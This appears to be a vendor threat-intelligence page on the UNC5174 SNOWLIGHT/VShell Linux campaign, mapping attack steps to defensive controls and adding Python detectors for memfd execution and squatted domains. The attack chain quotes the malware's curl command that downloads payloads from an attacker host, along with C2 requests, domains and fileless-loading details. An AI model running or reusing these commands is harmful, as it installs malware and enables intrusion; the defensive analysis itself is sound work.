UNC5174’s evolution in China’s ongoing cyber warfare: From SNOWLIGHT to VShell

Age: 4 months ago
Summary

UNC5174, a Chinese state-sponsored threat actor, has launched a new cyber campaign utilizing the open source tool VShell and a command and control infrastructure. After a year of operating under the radar, the Sysdig Threat Research Team identified this campaign in January 2025, marking a shift from the previously used SNOWLIGHT malware. VShell, a Remote Access Trojan (RAT), is favored for its stealthy and sophisticated techniques, such as employing fileless payloads and WebSockets for command and control. UNC5174 targets Western nations and various organizations, leveraging phishing and domain squatting tactics. The campaign highlights the increasing use of open source tools by threat actors for cost-effectiveness and obfuscation, complicating attribution. The SNOWLIGHT malware acts as a dropper for VShell, which is popular among Chinese-speaking cybercriminals. The threat actor's motivations are likely espionage and selling access to victim environments post-exploitation. Organizations face significant risks from these advanced techniques, which are expected to persist as UNC5174 continues supporting the Chinese government with custom and open source tools for espionage.

How BlueRock Helps

This security issue gives an attacker the ability to infiltrate systems using a multi-stage malware deployment, leveraging tools like SNOWLIGHT and VShell. The following protection guardrails can block the steps an attacker takes along that chain. If an attacker attempts to execute the initial malicious bash script, download_backd.sh, from an unauthorized location such as /tmp, Process Path Exec Allow prevents its execution. Should this script then try to use a utility like curl to download subsequent malware payloads such as dnsloger (SNOWLIGHT) or system_worker (Sliver), Process Exec Deny can block curl's execution if it is on a deny list, for instance because its path ends in /curl. Furthermore, Process Socket Deny is critical in preventing the curl process, or the malware itself such as dnsloger, from making outbound network connections to download additional payloads like the VShell RAT or to establish command and control with servers such as vs[.]gooogleasia[.]com or sex666vr[.]com. When the attacker's script attempts to establish persistence by modifying critical system files, for example by creating crontab entries or systemd service files for dnsloger and system_worker, Sensitive File Access detects and blocks these unauthorized changes, and can later prevent the VShell or Sliver implants from accessing sensitive data like SSH keys during espionage attempts. If the attack occurs within a containerized environment, Container Drift Protection (Binaries & Scripts) would block the execution of the initial script if it was not part of the original image and, crucially, prevent the fileless VShell RAT, even when disguised as [kworker/0:2], from running, since it is an unrecognized binary.
Finally, as the VShell RAT or Sliver implant attempts to establish command and control, potentially by binding shell input/output to a network socket for interactive remote access, Reverse Shell Protection blocks such reverse shell activity, neutralizing the attacker's ability to directly control the compromised system.

MITRE ATT&CK Techniques Inferred
  • T1059.004: Command and Scripting Interpreter: Unix Shell: The attacker utilized a malicious bash script to download multiple executable files for persistence. This technique is associated with T1059.004 - Command and Scripting Interpreter: Unix Shell, as the script was responsible for executing commands to download and set up the malware.
  • T1566: Phishing: The attacker used domain squatting to create fake domains that impersonate legitimate companies, likely for phishing and social engineering. This aligns with T1566 - Phishing, as it involves deceiving users into interacting with malicious domains.
  • T1203: Exploitation for Client Execution: The SNOWLIGHT malware acts as a dropper for a fileless payload, which is indicative of T1203 - Exploitation for Client Execution, as it exploits systems to execute the payload in memory without writing to disk.
  • T1055: Process Injection: The VShell payload operates entirely in memory, indicating the use of T1055 - Process Injection, as it involves injecting code into processes to evade detection and execute in memory.
  • T1071.001: Application Layer Protocol: Web Protocols: The attacker used WebSockets for command and control, which corresponds to T1071.001 - Application Layer Protocol: Web Protocols, as it involves using web protocols for communication with the C2 server.
  • T1543.002: Create or Modify System Process: Systemd Service: The malware establishes persistence by configuring malicious binaries to run at startup via systemd or init.d, aligning with T1543.002 - Create or Modify System Process: Systemd Service, as it involves setting up services to maintain persistence.
  • T1589: Gather Victim Identity Information: The use of custom and open source tools like VShell and SNOWLIGHT for espionage and access brokering suggests T1589 - Gather Victim Identity Information, as it involves collecting information for further exploitation or selling access.
Fact-Based Attack Chains

F1: UNC5174's new campaign (post-January 2025) on Linux systems, involving initial script execution, deployment of SNOWLIGHT malware, which then downloads and executes the VShell RAT in-memory using fileless techniques, and establishes C2 communication via WebSockets.

  • Attacker gains initial access to a Linux-based system. The exact method for this campaign is unclear. (Cited from: "Although it is unclear what UNC5174 is using for initial access in this campaign, it is targeting Linux-based systems.")
  • A malicious bash script, download_backd.sh, is executed on the compromised system. (Cited from: "Following initial access, a malicious bash script drops two payloads: dnsloger (associated with SNOWLIGHT malware) and system_worker (associated with Sliver and Cobalt Strike).")
    • BR-54: Container Drift Protection (Binaries & Scripts) - If this software ran inside a container, then this mechanism applies because it prevents the execution of new scripts like download_backd.sh if it was not part of the original container image at load time.
    • BR-62: Linux/Host Drift Protection - This mechanism applies because it would block the execution of download_backd.sh if this script was added to the system outside of a trusted package manager after boot and then executed.
    • BR-88: Process Path Exec Allow - This mechanism applies because it would prevent the execution of the download_backd.sh script if it is initially run from a path not on the execution allowlist (e.g., /tmp or a user-writable directory, as implied by later steps where files are kept in /tmp if not root).
  • The download_backd.sh script downloads two primary executables: dnsloger (SNOWLIGHT malware) and system_worker (Sliver/Cobalt Strike implant) from a C2 server, e.g., http://gooogleasia.com:8080/download_$executable. (Cited from: "This is the original bash script responsible for downloading and executing the dnsloger and system_worker binaries.", "curl -sL "http://gooogleasia.com:8080/download_$executable" -o "/tmp/$executable"")
    • BR-87: Process Socket Deny - This mechanism applies because it could prevent the curl process (executed by the download_backd.sh script) from initiating an outgoing network connection to http://gooogleasia.com:8080 if curl or the C2 destination is not on the allow list.
    • BR-90: Process Exec Deny - This mechanism applies because curl (invoked by the script as curl -sL ...) is a process whose execution can be denied if its path ends with '/curl' (a default denied suffix). If curl execution is blocked, the download of dnsloger and system_worker would fail.
  • The script verifies the MD5 hashes of the downloaded executables and attempts to re-download them if the hashes do not match. (Cited from: "The shell script contains various functions to verify if the malicious executables dropped correspond to the expected MD5 hashes. If they do not, the script attempts to re-download them.")
    • BR-87: Process Socket Deny - This mechanism applies because if re-download is attempted via curl, it could prevent the curl process from initiating an outgoing network connection if curl or the C2 destination is not on the allow list.
    • BR-90: Process Exec Deny - This mechanism applies because if curl is used for re-download and its execution is denied (e.g. path ending in '/curl'), the re-download would fail.
  • If the script is running as root, it moves the downloaded executables (dnsloger, system_worker) to /usr/bin/. Otherwise, they are kept in /tmp/. (Cited from: "When running as root, the script moves the executable to /usr/bin/", "If it is not, it keeps the downloaded executable in /tmp.")
    • BR-75: Critical Directory Write Protection - This mechanism applies because if /usr/bin/ is configured as a critical directory, any write attempt (like moving the malware executables dnsloger and system_worker there) by the script would be blocked, as this mechanism blocks any writes to specified critical directories from any process.
  • The download_backd.sh script establishes persistence for dnsloger and system_worker by adding them to crontab (for hourly execution and execution on reboot) and configuring them as systemd or init.d services. (Cited from: "For persistence, the script abuses crontab by adding the executables to ensure they run every hour and after reboots", "The script configures two malicious binaries, dnsloger and system_worker, to run at startup via systemd (newer systems) or init.d (older systems).")
    • BR-75: Critical Directory Write Protection - This mechanism applies because if the directories for crontab configurations (e.g., /etc/cron.d/, /var/spool/cron/) or systemd/init.d service files (e.g., /etc/systemd/system/, /etc/init.d/) are designated as critical, this mechanism would block the malicious script from writing new service or cron files into them.
    • BR-91: Sensitive File Access - This mechanism applies if the specific crontab files (e.g. /etc/crontab) or systemd service definition files being created or modified are on the sensitive file list, as it would detect or block unauthorized modifications to these critical configuration files.
  • The dnsloger (SNOWLIGHT) executable, once running, connects to its hardcoded C2 server vs[.]gooogleasia[.]com. (Cited from: "Analyzing the malware with radare2...reveals that some parameters and filenames are hardcoded. For instance...the C2 server, vs[.]gooogleasia[.]com.")
    • BR-87: Process Socket Deny - This mechanism applies by preventing the dnsloger process from initiating an outgoing network connection to vs[.]gooogleasia[.]com if the dnsloger process itself or the C2 destination is not on the configured allow list.
  • dnsloger sends an HTTP GET request (e.g., GET /?a=l64&h=vs.gooogleasia.com&t=ws_&p=8443 HTTP/1.1) to its C2 server to download the VShell RAT payload. (Cited from: "The dnsloger (SNOWLIGHT) binary downloads the VShell binary through a carefully crafted GET request to the C2 server.", "sendto res=1024 data=GET /?a=l64&h=vs.gooogleasia.com&t=ws_&p=8443 HTTP/1.1..Host: vs.gooogleasia.... A")
    • BR-87: Process Socket Deny - This mechanism applies by preventing the dnsloger process from initiating the outgoing HTTP GET request to vs[.]gooogleasia[.]com if the process or the destination is not on the allow list.
  • The received VShell payload data is XOR-decoded with the key 0x99. (Cited from: "The malware then waits to receive data from the server and XORs the data with 0x99, suggesting an attempt to obfuscate or encrypt the content before processing it.")
  • dnsloger uses the memfd_create system call to create an anonymous file descriptor in memory (e.g., named 'a') for the VShell payload. (Cited from: "It is created through the memfd_create (syscall 0x13f) by its dropper, SNOWLIGHT, in this campaign.", "< memfd_create fd=4(<m>a) name=a flags=1(MFD_CLOEXEC)")
    • BR-83: Syscall Deny Filter - This mechanism applies because the step explicitly mentions the memfd_create system call (syscall 0x13f). If memfd_create is on the deny list for the dnsloger process, its execution would be blocked, preventing the creation of the in-memory file for VShell. memfd_create is not one of the syscalls this mechanism will never block.
    • BR-85: Ephemeral Filesystem Behavior Analysis - This mechanism applies because memfd_create is used to create a file in a memory-backed filesystem. This activity is a key indicator monitored by BR-85, and an alert would be generated. Subsequent execution from this memory-backed file (as in step F1.11) would also be detected.
  • dnsloger executes the VShell payload directly from the memory file descriptor using the fexecve system call, disguising the VShell process name as [kworker/0:2]. (Cited from: "It is disguised as a system process ([kworker/0:2]) and executed through fexecve syscall", "fexecve(iVar3,&local_1c48,environ);" where local_1c48 = "[kworker/0:2]")
    • BR-54: Container Drift Protection (Binaries & Scripts) - If this software ran inside a container, then this mechanism applies because VShell, executed from memory as [kworker/0:2], is a new executable binary not present in the original container image manifest and its execution would be blocked.
    • BR-62: Linux/Host Drift Protection - This mechanism applies because the VShell payload is executed from memory and was not installed via a trusted package manager. It represents drift from the baseline of code installed via trusted package managers and its execution would be blocked.
    • BR-80: Tainted File Download Protection - This mechanism applies because the VShell payload (compiled code) was fetched over the network by dnsloger (in step F1.8) and is now being executed by dnsloger via fexecve. This matches the pattern of downloading code and subsequently executing it.
    • BR-85: Ephemeral Filesystem Behavior Analysis - This mechanism applies because VShell is being executed from a memory-backed file descriptor (created via memfd_create in step F1.10). Execution from memory-backed filesystems like those created by memfd_create is a key indicator monitored by BR-85.
    • BR-55: Reverse Shell Protection - This mechanism applies because VShell is a Remote Access Trojan (RAT) designed for remote access and control, which implies it can establish an interactive command and control session. If this involves binding shell STDIN/STDOUT/STDERR to the network socket, BR-55 would block this.
  • The fileless VShell RAT establishes Command and Control (C2) communication with vs[.]gooogleasia[.]com on port 8443 by upgrading an HTTP connection to a WebSocket connection. (Cited from: "The presence of the Upgrade: websocket and Connection: Upgrade headers in the write data shows that the process is attempting to upgrade from an HTTP connection to a WebSocket connection to the server at vs[.]gooogleasia[.]com on port 8443.")
    • BR-87: Process Socket Deny - This mechanism applies by preventing the VShell process (disguised as [kworker/0:2]) from initiating or maintaining an outgoing network connection to vs[.]gooogleasia[.]com if the VShell process itself or the C2 destination is not on the configured allow list.
    • BR-55: Reverse Shell Protection - This mechanism applies as the VShell RAT is establishing C2, a form of remote command and control. If this C2 communication facilitates interactive shell access by binding shell file descriptors to the network socket, BR-55 would detect and block it.
  • VShell performs memory mapping operations (mmap/mmap2) to allocate large, anonymous memory regions with PROT_NONE protection, possibly for future payload injection. (Cited from: "It performs multiple memory mappings (mmap and mmap2 system calls), with fd=-1 (indicating no file descriptor) combined with flags like MAP_PRIVATE | MAP_ANONYMOUS.", "Some of these mappings are huge (e.g., 64MB, 128MB, 512MB) and are allocated with PROT_NONE protection")
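As an added illustration of how the memfd_create/fexecve steps in F1 look from the defender's side (example code, not BlueRock's or Sysdig's), the following Python script flags a process whose /proc/<pid>/exe points into anonymous memory or whose argv[0] imitates a kernel thread name such as [kworker/0:2] without being a child of kthreadd. The three sample records are constructed, and the live /proc scan assumes a Linux host.

```python
"""Flag fileless execution from a memfd and kernel-thread name impersonation.

Added example, not BlueRock's or Sysdig's code. Sample records are constructed.
"""
import os
import re
from dataclasses import dataclass, field
from typing import List

KTHREADD_PID = 2  # every genuine kernel thread is a child of kthreadd (pid 2)
KERNEL_STYLE_NAME = re.compile(r"^\[[^\]]+\]$")  # e.g. "[kworker/0:2]"


@dataclass
class ProcInfo:
    pid: int
    ppid: int
    argv0: str  # first cmdline argument; "" for kernel threads, which have no cmdline
    exe: str    # readlink(/proc/<pid>/exe); "" when the link cannot be read
    cmdline: List[str] = field(default_factory=list)


def is_genuine_kernel_thread(p: ProcInfo) -> bool:
    """Real kernel threads hang off kthreadd, have no cmdline and no readable exe link."""
    return (p.ppid == KTHREADD_PID or p.pid == KTHREADD_PID) and not p.cmdline and not p.exe


def findings_for(p: ProcInfo) -> List[str]:
    """Return human-readable reasons this process deserves triage (empty list = nothing odd)."""
    reasons = []
    if p.exe.startswith("/memfd:"):
        # fexecve() on a memfd_create() descriptor leaves exe pointing at "/memfd:<name> (deleted)".
        reasons.append(f"pid {p.pid} executes from anonymous memory: {p.exe}")
    elif p.exe.endswith(" (deleted)"):
        # Binary unlinked after launch: also worth a look, but less specific than a memfd.
        reasons.append(f"pid {p.pid} executes a binary deleted from disk: {p.exe}")
    if KERNEL_STYLE_NAME.match(p.argv0) and not is_genuine_kernel_thread(p):
        # A user-space process named "[kworker/0:2]" whose parent is not kthreadd is an impostor.
        reasons.append(f"pid {p.pid} ({p.argv0}) mimics a kernel thread but has parent pid {p.ppid}")
    return reasons


def read_proc(pid: int) -> ProcInfo:
    """Build a ProcInfo from the live /proc; unreadable fields degrade to empty values."""
    base = f"/proc/{pid}"
    try:
        exe = os.readlink(f"{base}/exe")
    except OSError:
        exe = ""  # kernel threads, exited processes, or insufficient privileges
    try:
        with open(f"{base}/cmdline", "rb") as fh:
            cmdline = [a.decode(errors="replace") for a in fh.read().split(b"\0") if a]
    except OSError:
        cmdline = []
    ppid = 0
    try:
        with open(f"{base}/status") as fh:
            for line in fh:
                if line.startswith("PPid:"):
                    ppid = int(line.split()[1])
                    break
    except OSError:
        pass
    return ProcInfo(pid=pid, ppid=ppid, argv0=cmdline[0] if cmdline else "", exe=exe, cmdline=cmdline)


def scan_proc() -> List[str]:
    """Walk /proc and collect findings for every process we can read."""
    reasons = []
    for entry in os.listdir("/proc"):
        if entry.isdigit():
            reasons.extend(findings_for(read_proc(int(entry))))
    return reasons


# Constructed records: a real kworker, the VShell impostor from the page's trace, and plain curl.
GENUINE_KWORKER = ProcInfo(pid=123, ppid=2, argv0="", exe="", cmdline=[])
VSHELL_IMPOSTOR = ProcInfo(pid=4242, ppid=4100, argv0="[kworker/0:2]",
                           exe="/memfd:a (deleted)", cmdline=["[kworker/0:2]"])
PLAIN_CURL = ProcInfo(pid=4243, ppid=4100, argv0="curl", exe="/usr/bin/curl",
                      cmdline=["curl", "-sL", "http://example.invalid/"])

if __name__ == "__main__":
    for proc in (GENUINE_KWORKER, VSHELL_IMPOSTOR, PLAIN_CURL):
        print(proc.pid, findings_for(proc) or "ok")
    if os.path.isdir("/proc"):  # live scan only where /proc exists
        for r in scan_proc():
            print("LIVE:", r)
```

Some legitimate software (container runtimes, JIT engines) also executes from memfds, so treat a hit as a triage lead, with the kernel-thread impostor check as the stronger signal.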

F2: Parallel deployment and operation of a Sliver C2 implant (system_worker) by UNC5174 in its new campaign, providing an alternative C2 channel using secure protocols.

  • Following initial access to a Linux system, the download_backd.sh script downloads the system_worker executable, identified as a Sliver implant. (Cited from: "Following initial access, a malicious bash script drops two payloads: dnsloger (associated with SNOWLIGHT malware) and system_worker (associated with Sliver and Cobalt Strike).", "The downloaded executable system_worker was categorized as Sliver malware on VT")
    • BR-87: Process Socket Deny - This mechanism applies because it could prevent the curl process (executed by download_backd.sh) from initiating an outgoing network connection to download system_worker if curl or the C2 destination is not on the allow list.
    • BR-90: Process Exec Deny - This mechanism applies because curl is a default denied process. If download_backd.sh attempts to execute curl (e.g. path ending in '/curl') to download system_worker, its execution would be blocked.
  • The system_worker binary is UPX-packed and obfuscated using gobfuscate. (Cited from: "It is both UPX-packed and obfuscated with gobfuscate.")
  • Persistence for system_worker is established by the download_backd.sh script using crontab and systemd/init.d services, similar to dnsloger. (Cited from: "For persistence, the script abuses crontab by adding the executables to ensure they run every hour and after reboots", "The script configures two malicious binaries, dnsloger and system_worker, to run at startup via systemd (newer systems) or init.d (older systems).")
    • BR-75: Critical Directory Write Protection - This mechanism applies because if directories for crontab or systemd/init.d service files are designated as critical, this mechanism would block the script from writing new service/cron files for system_worker.
    • BR-91: Sensitive File Access - This mechanism applies if the specific crontab files or systemd service files being modified for system_worker are on the sensitive file list, as it would detect or block unauthorized modifications.
  • The executed system_worker (Sliver) implant establishes C2 communication with multiple subdomains hosted at sex666vr[.]com and gooogleasia[.]com. (Cited from: "Analyzing the runtime behavior of system_worker logs showed that this binary reaches out to multiple C2 subdomains hosted at sex666vr[.]com", "wg.gooogleasia.com")
    • BR-87: Process Socket Deny - This mechanism applies by preventing the system_worker (Sliver implant) process from initiating outgoing network connections to its C2 domains (e.g., sex666vr[.]com, gooogleasia[.]com) if the system_worker process or the destinations are not on the allow list.
    • BR-55: Reverse Shell Protection - This mechanism applies because the Sliver implant (system_worker) is establishing C2 communication for remote control. If this involves interactive shell capabilities over the socket, BR-55 is designed to prevent the binding of shell file descriptors to the network socket.
  • The Sliver implant utilizes secure communication protocols for its C2 channels, including mutual TLS (mTLS), WireGuard, and HTTPS, as indicated by accessed subdomains like mtls.sex666vr.com. (Cited from: "More specifically, the binary uses secure communication channels typical of Sliver implants, including mutual TLS (mTLS), WireGuard, and HTTPS. These protocols can be seen in the subdomains mentioned.")
    • BR-87: Process Socket Deny - This mechanism applies by preventing the system_worker (Sliver implant) process from establishing these secure C2 connections if the process or the destinations are not on the allow list.

F3: UNC5174's C2 infrastructure setup and maintenance, involving domain squatting to impersonate legitimate companies for phishing and hosting malware components.

  • UNC5174 registers and uses C2 domains like gooogleasia[.]com and sex666vr[.]com. (Cited from: "In this campaign, we observed new C2 domains: gooogleasia[.]com (with no affiliation to Google) sex666vr[.]com")
  • The actor employs domain squatting techniques, impersonating known companies (e.g., Google, Cloudflare, Telegram, Huione Pay) with domains such as gooogleasia[.]com, c1oudf1are[.]com, telegrams[.]icu, and huionepay[.]me. (Cited from: "Domain squatting was likely used for phishing purposes.", "The domains are predominantly impersonating known companies, with the most recent instance spoofing Cloudflare.", "These include: telegrams[.]icu (plausibly impersonating Telegram), huionepay[.]me (plausibly impersonating Huione Pay), c1oudf1are[.]com (plausibly impersonating Cloudflare)")
  • These domains are hosted on infrastructure such as Google Compute Engine (GCE) virtual machines, with IP addresses changing over time (e.g., gooogleasia[.]com resolved to 34[.]96[.]239[.]183 and later 34[.]96[.]252[.]230). (Cited from: "The domain gooogleasia[.]com was created on Sept. 1, 2023, and as of Jan. 16, 2025, it resolved to the IP address 34[.]96[.]239[.]183. We resolved this to an IP host name located in Hong Kong for a Google Compute Engine (GCE) virtual machine.", "During the investigation, we’ve noticed that a new IP started to host gooogleasia[.]com and its subdomains: 34[.]96[.]252[.]230, changed on February 21, 2025.")
  • Multiple subdomains are utilized, some incorporating other brand names (e.g., login[.]microsoftonline[.]gooogleasia[.]com), and are used for C2 operations for SNOWLIGHT (e.g., vs[.]gooogleasia[.]com) and Sliver/Cobalt Strike (e.g., evil[.]gooogleasia[.]com, mtls[.]sex666vr[.]com). (Cited from: "These domains have multiple subdomains, some of which have other brand names, such as login[.]microsoftonline[.]gooogleasia[.]com.", "MalTrail also classifies several subdomains of gooogleasia[.]com as Cobalt Strike C2s.")
  • This infrastructure is assessed to be used for phishing and social engineering to facilitate initial access. (Cited from: "We assess with high confidence that the new infrastructure aligns with domain squatting, likely employed for phishing and social engineering.")
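As an added example (not part of the original report), the following Python script flags lookalike labels of the kind listed in F3, such as gooogleasia, c1oudf1are and telegrams, by undoing digit-for-letter substitutions and measuring edit distance against a brand list; it can be run over domains pulled from DNS or proxy logs. The brand list, allowlist and homoglyph table are assumptions constructed for the example, and the registrable-domain check is a naive last-two-labels rule rather than a public-suffix lookup.

```python
"""Flag brand-impersonating (squatted) domain labels. Added example, not BlueRock's or Sysdig's code."""
from typing import List, Tuple

# Brands the report says were impersonated; extend for your own environment (constructed list).
BRANDS = ["google", "cloudflare", "telegram", "microsoft", "huionepay"]
# Registrable domains that may legitimately carry those names (constructed; naive last-two-labels rule).
ALLOWLIST = {"google.com", "cloudflare.com", "telegram.org", "microsoftonline.com"}
# Digit-for-letter substitutions seen in squatted names such as c1oudf1are (constructed table).
HOMOGLYPHS = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s", "7": "t"})
MAX_DISTANCE = 1  # one edit away from a brand (gooogle -> google) is enough to flag


def levenshtein(a: str, b: str) -> int:
    """Classic edit distance (insert/delete/substitute), O(len(a) * len(b))."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def normalize_label(label: str) -> str:
    """Lower-case and map common homoglyph digits back to letters."""
    return label.lower().translate(HOMOGLYPHS)


def window_distance(label: str, brand: str) -> int:
    """Smallest edit distance between the brand and any substring of the label whose length is
    within one of the brand's, so 'gooogleasia' still scores 1 against 'google'."""
    best = len(brand)
    for width in (len(brand) - 1, len(brand), len(brand) + 1):
        if width <= 0:
            continue
        for start in range(max(1, len(label) - width + 1)):
            best = min(best, levenshtein(label[start:start + width], brand))
    return best


def squat_candidates(domain: str) -> List[Tuple[str, str, int]]:
    """Return (label, brand, distance) for every label that looks like a brand impersonation.
    Accepts defanged input such as 'gooogleasia[.]com'; allowlisted registrable domains yield []."""
    labels = domain.replace("[.]", ".").strip(".").lower().split(".")
    if ".".join(labels[-2:]) in ALLOWLIST:
        return []
    hits = []
    for label in labels[:-1]:  # skip the TLD itself
        norm = normalize_label(label)
        for brand in BRANDS:
            dist = window_distance(norm, brand)
            if dist <= MAX_DISTANCE:
                hits.append((label, brand, dist))
    return hits


if __name__ == "__main__":
    # Constructed inputs: the campaign's squatted domains plus two benign ones.
    for d in ("gooogleasia[.]com", "c1oudf1are[.]com", "telegrams[.]icu",
              "login[.]microsoftonline[.]gooogleasia[.]com", "mail.google.com", "example.com"):
        print(d, "->", squat_candidates(d) or "clean")
```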

F4: UNC5174's earlier (November 2024) campaign variation using SNOWLIGHT to drop VShell, featuring similar TTPs but different C2 infrastructure (googlespays[.]com).

  • In November 2024, UNC5174 deployed a SNOWLIGHT malware variant. (Cited from: "we found that the first sample dropping a VShell binary in the same fashion we observed with our newest binary was first detected in November 2024.")
  • This SNOWLIGHT variant acted as a dropper for a VShell binary. (Cited from: "the first sample dropping a VShell binary...was first detected in November 2024.")
    • BR-80: Tainted File Download Protection - This mechanism applies if the SNOWLIGHT variant downloaded the VShell binary (compiled code) over the network and VShell was subsequently executed. The step describes SNOWLIGHT acting as a dropper, implying download and subsequent execution.
    • BR-87: Process Socket Deny - If SNOWLIGHT downloaded VShell over the network, this mechanism could apply by preventing SNOWLIGHT from making the necessary socket connection if SNOWLIGHT or the C2 was not on the allow list.
  • SNOWLIGHT executed the VShell payload in memory, with the VShell process masquerading under the name [kworker/0:2]. (Cited from: "SNOWLIGHT malware, when executing and downloading in memory, uses the name “[kworker/0:2].”", "using this query: behaviour_processes:"/memfd:a (deleted)/ [kworker/0:2]"")
    • BR-54: Container Drift Protection (Binaries & Scripts) - If this execution occurred within a container, this mechanism applies because VShell, executed from memory as [kworker/0:2], is a new binary not in the original image and its execution would be blocked.
    • BR-62: Linux/Host Drift Protection - This mechanism applies as VShell is executed from memory and not installed via a trusted package manager, representing drift that would be blocked.
    • BR-85: Ephemeral Filesystem Behavior Analysis - This mechanism applies as executing a payload from memory (implied by /memfd:a (deleted)/) like VShell, especially when disguised as a kernel worker, is a key indicator of fileless execution that BR-85 monitors and alerts on.
    • BR-55: Reverse Shell Protection - This mechanism applies as VShell is a RAT. If its execution as [kworker/0:2] involves establishing an interactive C2 shell by binding shell FDs to network sockets, BR-55 would block this.
  • The VShell binary used in this November 2024 campaign established C2 communication via the WebSocket protocol. (Cited from: "The November 2024 VShell binary also uses a WebSocket protocol")
    • BR-87: Process Socket Deny - This mechanism applies by preventing the VShell process from establishing the WebSocket C2 connection if the VShell process or the C2 destination is not on the allow list.
    • BR-55: Reverse Shell Protection - This mechanism applies if the WebSocket C2 communication facilitates interactive shell-like remote control, by preventing the binding of shell FDs to the socket.
  • The C2 communication for this VShell instance was directed to the domain apib[.]googlespays[.]com. (Cited from: "The November 2024 VShell binary also uses a WebSocket protocol over the C2 domain apib[.]googlespays[.]com")
    • BR-87: Process Socket Deny - This mechanism applies by preventing the VShell process from connecting to apib[.]googlespays[.]com if this destination is not on the allow list.
  • The primary C2 domain for this earlier campaign was googlespays[.]com, also impersonating Google. (Cited from: "This led to the discovery of additional UNC5174 C2 infrastructure from November 2024: googlespays[.]com. The Google brand impersonation matches the pattern of the current C2 domain")

F5: Historical UNC5174 TTP: Exploitation of Ivanti Cloud Service Appliance (CSA) products.

  • UNC5174 targets Ivanti Cloud Service Appliance (CSA) products. (Cited from: "UNC5174 exploited Ivanti’s Cloud Service Appliance (CSA) products during the 2024 Summer Olympics.")
  • The actor exploits vulnerabilities in these Ivanti CSA products to gain unauthorized access. (Cited from: "UNC5174 exploited Ivanti’s Cloud Service Appliance (CSA) products during the 2024 Summer Olympics.")
  • This access is then used for further malicious activities, as observed during the 2024 Summer Olympics. (Cited from: "UNC5174 exploited Ivanti’s Cloud Service Appliance (CSA) products during the 2024 Summer Olympics.")

F6: Historical UNC5174 TTP: Phishing with malicious email attachments.

  • UNC5174 conducts phishing campaigns. (Cited from: "According to SOCRadar, this threat actor also leveraged phishing with malicious email attachments to deliver their malware in 2019.")
  • Malicious email attachments are used as the delivery vector for their malware. (Cited from: "this threat actor also leveraged phishing with malicious email attachments to deliver their malware in 2019.")
  • This technique was observed being used by UNC5174 in 2019. (Cited from: "in 2019.")